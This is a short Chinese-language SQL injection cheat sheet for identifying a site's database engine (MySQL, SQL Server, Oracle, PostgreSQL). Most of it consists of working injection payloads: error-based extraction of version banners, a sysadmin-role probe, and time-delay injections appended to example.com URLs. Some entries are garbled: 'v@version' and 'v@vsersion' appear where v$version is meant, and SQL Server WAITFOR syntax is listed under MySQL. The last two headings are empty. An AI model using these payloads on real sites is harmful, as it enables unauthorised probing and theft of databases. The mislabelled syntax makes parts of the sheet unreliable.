1.通过运算符(也可以将符号改为url编码)
sql server: select 'a'+'b' 等价于a'%2b'b
mysql: select 'a' 'b' 或者 select concat('a','b') %20
oracle: select 'a' ||'b'或者 select concat('a','b')
postgresql: select 'a' ||'b'或者 select concat('a','b')
2.通过错误消息判断
sqlserver
and 1 in(select @@version) --
and 1=convert(int,(select @@version)) --
www.example.com/a.php?id=1/is_srvrolemember('sysadmin')
mysql
and(select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)#
oracle
and 1=(utl_inaddr.get_host_name((select banner from v@version where rownum=1))) --
and 1=ctxsys.drithsx.sn(1,(select banner from v@vsersion where rownum=1)) --
postgresql
and 1=cast((select version())::text as numeric)--
3.通过时间延迟
mysql:www.example.com/a.php?id=1;if+(system_user='sa')+WAITFOR+DELAY+'0:0:5' --或者使用benchmark(time,string)
sqlserver: www.example.com/a.php?id=1;waitfor delay '0:0:5';--
oracle:www.example.com/a.php?id=1 or 1=dbms_pipe.receive_message('RDS',10)
postgresql: www.example.com/a.php?id=1;select pg_sleep(10);--
4.通过强制类型转换运算符
sql server: SELECT CAST('123' AS varchar)
mysql: SELECT CAST('123' AS char)
oracle: SELECT CAST(1 AS varchar) FROM dual
postgresql: SELECT CAST(123 AS text)
5.通过特定函数
sql server: select @@ version
mysql: select version() 或者 select @@ version
oracle: select banner from v$version 或者 select banner from v$version where rownum=1
postgresql: select version()
6.通过注释符
7.上各种识别工具